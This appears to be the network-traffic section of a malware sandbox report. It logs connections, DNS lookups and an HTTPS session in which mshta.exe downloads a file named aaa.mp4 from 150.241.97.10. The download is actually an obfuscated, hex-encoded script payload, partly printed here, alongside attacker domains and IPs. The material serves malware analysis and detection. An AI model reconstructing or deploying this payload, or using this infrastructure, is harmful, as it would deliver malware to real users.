Dec 27, 2024 09:06:53.507879972 CET  49939  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:53.507939100 CET  443    49939  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:53.507998943 CET  49939  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:53.596487045 CET  49939  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:53.596528053 CET  443    49939  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:53.596581936 CET  49939  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:53.596587896 CET  443    49939  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:53.596617937 CET  443    49939  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:55.445631027 CET  49942  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:06:55.445673943 CET  443    49942  206.206.125.221  192.168.2.7
Dec 27, 2024 09:06:55.445899010 CET  49942  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:06:55.532704115 CET  49942  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:06:55.532732964 CET  443    49942  206.206.125.221  192.168.2.7
Dec 27, 2024 09:06:55.532782078 CET  49942  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:06:55.532787085 CET  443    49942  206.206.125.221  192.168.2.7
Dec 27, 2024 09:06:55.532815933 CET  443    49942  206.206.125.221  192.168.2.7
Dec 27, 2024 09:06:56.554601908 CET  49947  443    192.168.2.7      94.131.118.216
Dec 27, 2024 09:06:56.554672003 CET  443    49947  94.131.118.216   192.168.2.7
Dec 27, 2024 09:06:56.554785013 CET  49947  443    192.168.2.7      94.131.118.216
Dec 27, 2024 09:06:56.636524916 CET  49947  443    192.168.2.7      94.131.118.216
Dec 27, 2024 09:06:56.636559963 CET  443    49947  94.131.118.216   192.168.2.7
Dec 27, 2024 09:06:56.636704922 CET  443    49947  94.131.118.216   192.168.2.7
Dec 27, 2024 09:06:56.636745930 CET  49947  443    192.168.2.7      94.131.118.216
Dec 27, 2024 09:06:56.636759996 CET  443    49947  94.131.118.216   192.168.2.7
Dec 27, 2024 09:06:57.664796114 CET  49949  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:57.664854050 CET  443    49949  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:57.664937019 CET  49949  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:57.744653940 CET  49949  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:57.744673014 CET  443    49949  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:57.744735956 CET  443    49949  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:57.744765043 CET  49949  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:57.744787931 CET  443    49949  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:59.789453983 CET  49955  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:59.789527893 CET  443    49955  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:59.789606094 CET  49955  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:59.878715038 CET  49955  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:06:59.878756046 CET  443    49955  188.132.183.159  192.168.2.7
Dec 27, 2024 09:06:59.878833055 CET  443    49955  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:00.930227995 CET  49960  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:07:00.930284023 CET  443    49960  206.206.125.221  192.168.2.7
Dec 27, 2024 09:07:00.930366039 CET  49960  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:07:01.007353067 CET  49960  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:07:01.007381916 CET  443    49960  206.206.125.221  192.168.2.7
Dec 27, 2024 09:07:01.007437944 CET  49960  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:07:01.007446051 CET  443    49960  206.206.125.221  192.168.2.7
Dec 27, 2024 09:07:02.024528027 CET  49962  443    192.168.2.7      94.131.118.216
Dec 27, 2024 09:07:02.024585009 CET  443    49962  94.131.118.216   192.168.2.7
Dec 27, 2024 09:07:02.024705887 CET  49962  443    192.168.2.7      94.131.118.216
Dec 27, 2024 09:07:02.081878901 CET  49962  443    192.168.2.7      94.131.118.216
Dec 27, 2024 09:07:02.081917048 CET  443    49962  94.131.118.216   192.168.2.7
Dec 27, 2024 09:07:02.081958055 CET  443    49962  94.131.118.216   192.168.2.7
Dec 27, 2024 09:07:02.081971884 CET  49962  443    192.168.2.7      94.131.118.216
Dec 27, 2024 09:07:02.081988096 CET  443    49962  94.131.118.216   192.168.2.7
Dec 27, 2024 09:07:03.101825953 CET  49967  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:07:03.101872921 CET  443    49967  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:03.101994991 CET  49967  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:07:03.157604933 CET  49967  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:07:03.157604933 CET  49967  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:07:03.157622099 CET  443    49967  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:03.157639027 CET  443    49967  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:03.157716990 CET  443    49967  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:03.170211077 CET  49968  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:07:03.170269966 CET  443    49968  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:03.170382977 CET  49968  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:07:03.248646975 CET  49968  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:07:03.248697996 CET  443    49968  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:03.248805046 CET  443    49968  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:03.248806953 CET  49968  443    192.168.2.7      188.132.183.159
Dec 27, 2024 09:07:03.248833895 CET  443    49968  188.132.183.159  192.168.2.7
Dec 27, 2024 09:07:03.263500929 CET  49969  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:07:03.263561010 CET  443    49969  206.206.125.221  192.168.2.7
Dec 27, 2024 09:07:03.263864994 CET  49969  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:07:03.338643074 CET  49969  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:07:03.338692904 CET  443    49969  206.206.125.221  192.168.2.7
Dec 27, 2024 09:07:03.338742018 CET  443    49969  206.206.125.221  192.168.2.7
Dec 27, 2024 09:07:03.338743925 CET  49969  443    192.168.2.7      206.206.125.221
Dec 27, 2024 09:07:03.338764906 CET  443    49969  206.206.125.221  192.168.2.7
Dec 27, 2024 09:07:03.350300074 CET  49970  443    192.168.2.7      94.131.118.216
                                                                      Dec 27, 2024 09:07:03.350353003 CET4434997094.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:03.350406885 CET49970443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:03.422521114 CET49970443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:03.422545910 CET4434997094.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:03.422590971 CET49970443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:03.422595978 CET4434997094.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:03.422636032 CET4434997094.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:03.434660912 CET49971443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:03.434708118 CET44349971188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:03.434767008 CET49971443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:03.509957075 CET49971443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:03.509983063 CET44349971188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:03.510042906 CET44349971188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:03.510056973 CET49971443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:03.510076046 CET44349971188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:05.560134888 CET49977443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:05.560198069 CET44349977188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:05.560261011 CET49977443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:05.648550034 CET49977443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:05.648588896 CET44349977188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:05.648632050 CET44349977188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:07.758124113 CET49983443192.168.2.7206.206.125.221
                                                                      Dec 27, 2024 09:07:07.758177042 CET44349983206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:07.758238077 CET49983443192.168.2.7206.206.125.221
                                                                      Dec 27, 2024 09:07:07.998255968 CET49983443192.168.2.7206.206.125.221
                                                                      Dec 27, 2024 09:07:07.998255968 CET49983443192.168.2.7206.206.125.221
                                                                      Dec 27, 2024 09:07:07.998281002 CET44349983206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:07.998286963 CET44349983206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:07.998361111 CET44349983206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:10.180389881 CET49989443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:10.180448055 CET4434998994.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:10.180521011 CET49989443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:10.275348902 CET49989443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:10.275378942 CET4434998994.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:10.275427103 CET49989443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:10.275434017 CET4434998994.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:10.275456905 CET4434998994.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:16.944884062 CET50005443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:16.944940090 CET44350005188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:16.945202112 CET50005443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:16.999917984 CET50005443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:16.999958038 CET44350005188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:17.000006914 CET50005443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:17.000011921 CET44350005188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:17.000041962 CET44350005188.132.183.159192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:05:20.894208908 CET | 65300 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 09:05:21.165812969 CET | 53 | 65300 | 1.1.1.1 | 192.168.2.7
Dec 27, 2024 09:05:37.173464060 CET | 65139 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 09:05:50.521522999 CET | 57451 | 53 | 192.168.2.7 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 09:05:20.894208908 CET | 192.168.2.7 | 1.1.1.1 | 0x40ab | Standard query (0) | pravo-bashkortostan.ru | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:05:37.173464060 CET | 192.168.2.7 | 1.1.1.1 | 0x5b6b | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:05:50.521522999 CET | 192.168.2.7 | 1.1.1.1 | 0x8609 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 09:05:21.165812969 CET | 1.1.1.1 | 192.168.2.7 | 0x40ab | No error (0) | pravo-bashkortostan.ru |  | 150.241.97.10 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:05:26.494379044 CET | 1.1.1.1 | 192.168.2.7 | 0x85cb | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:05:26.494379044 CET | 1.1.1.1 | 192.168.2.7 | 0x85cb | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:05:37.312712908 CET | 1.1.1.1 | 192.168.2.7 | 0x5b6b | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 09:05:51.360769033 CET | 1.1.1.1 | 192.168.2.7 | 0x8609 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 09:06:16.557742119 CET | 1.1.1.1 | 192.168.2.7 | 0x87fd | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:06:16.557742119 CET | 1.1.1.1 | 192.168.2.7 | 0x87fd | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:06:29.029407978 CET | 1.1.1.1 | 192.168.2.7 | 0x5d5e | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:06:29.029407978 CET | 1.1.1.1 | 192.168.2.7 | 0x5d5e | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:06:53.097491980 CET | 1.1.1.1 | 192.168.2.7 | 0x4f1d | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:06:53.097491980 CET | 1.1.1.1 | 192.168.2.7 | 0x4f1d | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:17.160099030 CET | 1.1.1.1 | 192.168.2.7 | 0x6626 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:17.160099030 CET | 1.1.1.1 | 192.168.2.7 | 0x6626 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
• 150.241.97.10
• pravo-bashkortostan.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 150.241.97.10 | 443 | 6404 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:05:12 UTC | 324 | OUT | GET /aaa.mp4 HTTP/1.1
Accept: */*
Accept-Language: en-CH
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 150.241.97.10
Connection: Keep-Alive
2024-12-27 08:05:13 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:05:13 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 24 Dec 2024 02:55:06 GMT
ETag: "796cb-629fb3d863680"
Accept-Ranges: bytes
Content-Length: 497355
Connection: close
Content-Type: video/mp4
2024-12-27 08:05:13 UTC | 7939 | IN | Data Raw: 36 36 54 37 35 65 36 65 46 36 33 62 37 34 42 36 39 41 36 66 67 36 65 55 32 30 61 36 39 4c 36 38 66 37 31 45 34 63 56 36 65 62 32 38 47 37 36 70 37 31 52 37 33 4d 35 35 70 34 33 63 32 39 72 37 62 7a 37 36 69 36 31 51 37 32 44 32 30 56 35 30 61 34 65 54 37 32 4e 36 35 4b 36 66 54 37 39 6c 33 64 44 32 30 68 32 37 74 32 37 4e 33 62 5a 36 36 4d 36 66 78 37 32 6c 32 30 79 32 38 76 37 36 63 36 31 50 37 32 50 32 30 6d 36 63 58 36 35 73 35 31 76 34 33 66 36 31 46 32 30 4b 33 64 6b 32 30 48 33 30 71 33 62 55 36 63 76 36 35 70 35 31 58 34 33 66 36 31 5a 32 30 4d 33 63 48 32 30 50 37 36 72 37 31 74 37 33 41 35 35 6e 34 33 68 32 65 74 36 63 50 36 35 45 36 65 4f 36 37 45 37 34 65 36 38 76 33 62 57 32 30 54 36 63 41 36 35 51 35 31 79 34 33 68 36 31 59 32 62 68 32 62 46
Data Ascii: 66T75e6eF63b74B69A6fg6eU20a69L68f71E4cV6eb28G76p71R73M55p43c29r7bz76i61Q72D20V50a4eT72N65K6fT79l3dD20h27t27N3bZ66M6fx72l20y28v76c61P72P20m6cX65s51v43f61F20K3dk20H30q3bU6cv65p51X43f61Z20M3cH20P76r71t73A55n43h2et6cP65E6eO67E74e68v3bW20T6cA65Q51y43h61Y2bh2bF
2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 37 46 33 36 41 32 63 61 33 39 6c 33 37 78 33 31 73 32 63 76 33 39 5a 33 38 67 33 39 61 32 63 70 33 39 6b 33 38 66 33 38 64 32 63 7a 33 39 56 33 37 4d 33 32 63 32 63 48 33 39 6e 33 38 46 33 38 6a 32 63 58 33 39 6d 33 37 45 33 31 59 32 63 52 33 39 42 33 39 76 33 31 62 32 63 51 33 39 4c 33 38 4c 33 38 48 32 63 42 33 39 6f 33 37 46 33 36 47 32 63 46 33 39 5a 33 38 56 33 36 4b 32 63 68 33 39 4b 33 38 64 33 39 44 32 63 67 33 39 51 33 38 65 33 38 53 32 63 63 33 39 69 33 37 45 33 38 75 32 63 70 33 39 57 33 39 63 33 31 6f 32 63 68 33 39 59 33 39 62 33 30 74 32 63 64 33 39 45 33 36 4b 33 39 64 32 63 5a 33 39 59 33 37 62 33 34 4b 32 63 51 33 39 47 33 36 58 33 39 69 32 63 53 33 39 76 33 37 43 33 36 4e 32 63 49 33 39 41 33 37 72 33 38 42 32 63 58 33 39 63 33 37 7a 33
Data Ascii: 7F36A2ca39l37x31s2cv39Z38g39a2cp39k38f38d2cz39V37M32c2cH39n38F38j2cX39m37E31Y2cR39B39v31b2cQ39L38L38H2cB39o37F36G2cF39Z38V36K2ch39K38d39D2cg39Q38e38S2cc39i37E38u2cp39W39c31o2ch39Y39b30t2cd39E36K39d2cZ39Y37b34K2cQ39G36X39i2cS39v37C36N2cI39A37r38B2cX39c37z3
2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 33 39 61 33 39 74 33 30 57 32 63 6e 33 39 58 33 38 7a 33 37 52 32 63 4c 33 39 63 33 37 6b 33 38 44 32 63 59 33 39 56 33 37 6b 33 33 59 32 63 4b 33 39 4e 33 38 4b 33 39 4b 32 63 6a 33 39 43 33 37 48 33 37 45 32 63 79 33 39 58 33 36 66 33 39 69 32 63 4f 33 39 58 33 37 46 33 37 75 32 63 42 33 39 49 33 37 53 33 34 72 32 63 54 33 39 62 33 38 76 33 36 53 32 63 42 33 39 67 33 37 77 33 36 52 32 63 58 33 39 4e 33 37 56 33 37 6d 32 63 71 33 39 66 33 36 6a 33 39 73 32 63 58 33 39 75 33 38 68 33 38 6b 32 63 53 33 39 70 33 39 59 33 31 51 32 63 73 33 39 51 33 39 43 33 31 6e 32 63 58 33 39 71 33 37 42 33 38 51 32 63 43 33 39 73 33 37 45 33 35 69 32 63 52 33 39 72 33 37 4a 33 38 44 32 63 46 33 39 71 33 37 67 33 34 6b 32 63 42 33 39 73 33 37 72 33 30 6a 32 63 6f 33 39 4e
Data Ascii: 39a39t30W2cn39X38z37R2cL39c37k38D2cY39V37k33Y2cK39N38K39K2cj39C37H37E2cy39X36f39i2cO39X37F37u2cB39I37S34r2cT39b38v36S2cB39g37w36R2cX39N37V37m2cq39f36j39s2cX39u38h38k2cS39p39Y31Q2cs39Q39C31n2cX39q37B38Q2cC39s37E35i2cR39r37J38D2cF39q37g34k2cB39s37r30j2co39N
2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 66 32 63 68 33 39 6f 33 37 66 33 31 58 32 63 76 33 39 44 33 39 6a 33 30 68 32 63 54 33 39 48 33 37 45 33 31 6d 32 63 49 33 39 68 33 37 50 33 30 4b 32 63 68 33 39 76 33 37 7a 33 38 4c 32 63 70 33 39 4f 33 37 55 33 38 6f 32 63 66 33 39 46 33 37 6e 33 31 44 32 63 69 33 39 56 33 37 54 33 38 54 32 63 45 33 39 61 33 37 50 33 35 59 32 63 61 33 39 65 33 37 65 33 37 4c 32 63 6a 33 39 50 33 39 4b 33 31 4b 32 63 63 33 39 54 33 38 4a 33 36 48 32 63 48 33 39 78 33 38 59 33 36 66 32 63 4f 33 39 73 33 37 71 33 37 54 32 63 55 33 39 72 33 37 72 33 35 70 32 63 50 33 39 66 33 37 79 33 36 79 32 63 6f 33 39 6b 33 37 68 33 37 69 32 63 52 33 39 72 33 37 6a 33 36 44 32 63 52 33 39 6f 33 36 63 33 39 61 32 63 45 33 39 4b 33 37 4c 33 38 4c 32 63 77 33 39 67 33 37 77 33 34 6c 32 63
Data Ascii: f2ch39o37f31X2cv39D39j30h2cT39H37E31m2cI39h37P30K2ch39v37z38L2cp39O37U38o2cf39F37n31D2ci39V37T38T2cE39a37P35Y2ca39e37e37L2cj39P39K31K2cc39T38J36H2cH39x38Y36f2cO39s37q37T2cU39r37r35p2cP39f37y36y2co39k37h37i2cR39r37j36D2cR39o36c39a2cE39K37L38L2cw39g37w34l2c
2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 37 5a 33 33 49 32 63 49 33 39 6d 33 37 52 33 30 65 32 63 73 33 39 4e 33 37 62 33 32 4b 32 63 4d 33 39 62 33 38 50 33 36 41 32 63 6d 33 39 6b 33 37 66 33 33 6e 32 63 4a 33 39 46 33 37 75 33 34 66 32 63 4e 33 39 6e 33 37 58 33 38 73 32 63 77 33 39 78 33 37 69 33 30 6b 32 63 5a 33 39 67 33 38 65 33 38 48 32 63 4d 33 39 49 33 39 70 33 31 70 32 63 56 33 39 70 33 38 5a 33 39 52 32 63 6e 33 39 46 33 37 51 33 33 50 32 63 46 33 39 5a 33 39 67 33 30 58 32 63 43 33 39 49 33 37 61 33 32 61 32 63 43 33 39 74 33 38 75 33 37 56 32 63 4f 33 39 59 33 36 68 33 39 76 32 63 65 33 39 71 33 37 6c 33 31 66 32 63 77 33 39 48 33 37 6f 33 38 64 32 63 76 33 39 71 33 39 52 33 31 54 32 63 67 33 39 63 33 37 73 33 34 49 32 63 57 33 39 49 33 37 6e 33 35 58 32 63 52 33 39 4b 33 37 69 33
Data Ascii: 7Z33I2cI39m37R30e2cs39N37b32K2cM39b38P36A2cm39k37f33n2cJ39F37u34f2cN39n37X38s2cw39x37i30k2cZ39g38e38H2cM39I39p31p2cV39p38Z39R2cn39F37Q33P2cF39Z39g30X2cC39I37a32a2cC39t38u37V2cO39Y36h39v2ce39q37l31f2cw39H37o38d2cv39q39R31T2cg39c37s34I2cW39I37n35X2cR39K37i3
2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 33 39 66 33 37 72 33 34 62 32 63 5a 33 39 42 33 39 4a 33 31 75 32 63 56 33 39 69 33 39 54 33 31 76 32 63 53 33 39 46 33 38 4f 33 39 49 32 63 45 33 39 47 33 37 6a 33 38 4d 32 63 7a 33 39 62 33 37 4f 33 34 6b 32 63 53 33 39 51 33 37 6f 33 33 4f 32 63 78 33 39 6b 33 37 4e 33 38 43 32 63 54 33 39 69 33 39 75 33 31 48 32 63 49 33 39 54 33 37 5a 33 34 53 32 63 64 33 39 4e 33 37 6f 33 30 66 32 63 4a 33 39 46 33 38 4d 33 38 52 32 63 73 33 39 4e 33 37 62 33 37 4b 32 63 62 33 39 79 33 37 67 33 36 6d 32 63 52 33 39 48 33 36 4a 33 39 49 32 63 4e 33 39 75 33 37 78 33 34 6b 32 63 56 33 39 51 33 37 62 33 32 6a 32 63 4c 33 39 48 33 37 7a 33 30 6b 32 63 68 33 39 51 33 38 6a 33 37 6d 32 63 6d 33 39 6a 33 39 61 33 31 4d 32 63 44 33 39 57 33 38 56 33 36 6a 32 63 4a 33 39 43
Data Ascii: 39f37r34b2cZ39B39J31u2cV39i39T31v2cS39F38O39I2cE39G37j38M2cz39b37O34k2cS39Q37o33O2cx39k37N38C2cT39i39u31H2cI39T37Z34S2cd39N37o30f2cJ39F38M38R2cs39N37b37K2cb39y37g36m2cR39H36J39I2cN39u37x34k2cV39Q37b32j2cL39H37z30k2ch39Q38j37m2cm39j39a31M2cD39W38V36j2cJ39C
2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 4c 33 35 45 32 63 71 33 31 49 33 30 79 33 31 53 33 32 61 32 63 6f 33 31 4e 33 30 63 33 31 70 33 34 64 32 63 70 33 31 53 33 30 6a 33 31 72 33 34 68 32 63 74 33 39 72 33 36 64 33 31 57 32 63 41 33 39 4d 33 36 6c 33 31 78 32 63 57 33 31 4f 33 30 52 33 31 47 33 32 64 32 63 4c 33 31 74 33 30 52 33 30 4e 33 34 66 32 63 79 33 31 63 33 30 73 33 32 44 33 32 6d 32 63 67 33 31 63 33 30 6d 33 32 67 33 30 68 32 63 4f 33 31 74 33 30 4c 33 33 76 33 38 4e 32 63 42 33 31 4e 33 30 49 33 33 51 33 35 6b 32 63 4b 33 31 72 33 30 46 33 32 4c 33 36 62 32 63 45 33 31 49 33 30 68 33 33 6a 33 37 52 32 63 76 33 31 4d 33 30 62 33 34 6d 33 32 6c 32 63 4f 33 39 6f 33 36 71 33 37 46 32 63 78 33 39 74 33 38 4f 33 38 67 32 63 44 33 31 69 33 30 63 33 33 43 33 35 57 32 63 74 33 31 62 33 30
Data Ascii: L35E2cq31I30y31S32a2co31N30c31p34d2cp31S30j31r34h2ct39r36d31W2cA39M36l31x2cW31O30R31G32d2cL31t30R30N34f2cy31c30s32D32m2cg31c30m32g30h2cO31t30L33v38N2cB31N30I33Q35k2cK31r30F32L36b2cE31I30h33j37R2cv31M30b34m32l2cO39o36q37F2cx39t38O38g2cD31i30c33C35W2ct31b30
2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 97 f5 01 33 f7 6a 01 34 62 ba 01 34 c4 ac 01 35 17 48 01 35 65 00 01 35 b1 ec 01 35 ff be 01 36 39 6a 01 36 6f 53 01 36 ab 3b 01 36 d6 cb 01 37 1a 12 01 37 9b e5 01 37 fb 88 01 38 6d 52 01 38 ea bc 01 39 6a c5 01 39 d9 f4 01 3a 4a f4 01 3a a2 9f 01 3b 08 54 01 3b 79 c9 01 3b ee 63 01 3c 63 84 01 3c d9 23 01 3d 4b ec 01 3d c1 a0 01 3e 3a 12 01 3e bd 4d 01 3f 1d 7a 01 3f 5b ad 01 3f bd 44 01 40 03 39 01 40 50 8f 01 40 a7 e0 01 41 13 b3 01 41 85 43 01 41 f4 ed 01 42 6c 7f 01 42 f7 9f 01 43 e4 2f 01 44 f2 dd 01 45 f5 39 01 46 f0 ac 01 47 e8 55 01 48 d9 5a 01 49 b0 d7 01 4a 55 16 01 4b 24 d2 01 4b fb 86 01 4c cb aa 01 4d a2 61 01 4e 73 e0 01 4f 34 89 01 4f d5 74 01 50 5b 46 01 50 cd 6f 01 51 34 64 01 51 8e 4e 01 52 1f fb 01 52 9b e5 01 53 2b 22 01 53 bd b7 01
Data Ascii: 3j4b45H5e5569j6oS6;67778mR89j9:J:;T;y;c<c<#=K=>:>M?z?[?D@9@P@AACABlBC/DE9FGUHZIJUK$KLMaNsO4OtP[FPoQ4dQNRRS+"S
2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 05 7d a0 12 05 7e 80 73 05 7f 6c e8 05 80 47 4b 05 81 24 d5 05 81 ed 55 05 82 93 56 05 83 3f 33 05 83 e3 4f 05 84 75 fd 05 84 e2 bb 05 85 3e c1 05 85 96 3a 05 85 c6 a8 05 86 47 f9 05 86 fd 2e 05 87 86 29 05 88 64 17 05 89 4a e0 05 8a 2e bd 05 8b 00 9d 05 8b be 48 05 8c 6e 31 05 8d 24 1a 05 8d eb ad 05 8e 5d b7 05 8e af 00 05 8f 01 49 05 8f 64 cf 05 90 05 d0 05 91 11 d3 05 91 b6 10 05 92 65 75 05 93 18 e2 05 93 bd 07 05 94 5d d9 05 94 fc 7e 05 95 98 fd 05 96 32 01 05 96 bf 03 05 97 6b 4c 05 98 0f 5e 05 98 96 ae 05 99 77 4a 05 99 fe f6 05 9a 61 a3 05 9a ae 33 05 9a ee 15 05 9b 25 df 05 9b 4f 2a 05 9b 8c 4d 05 9b ae 1d 05 9b d5 d8 05 9c 09 fb 05 9c 65 eb 05 9c e3 78 05 9d a1 38 05 9e 0d e9 05 9e ab 80 05 a0 15 f1 05 a1 be e2 05 a2 fe 6f 05 a4 09 63 05 a4 bc
Data Ascii: }~slGK$UV?3Ou>:G.)dJ.Hn1$]Ideu]~2kL^wJa3%O*Mex8oc
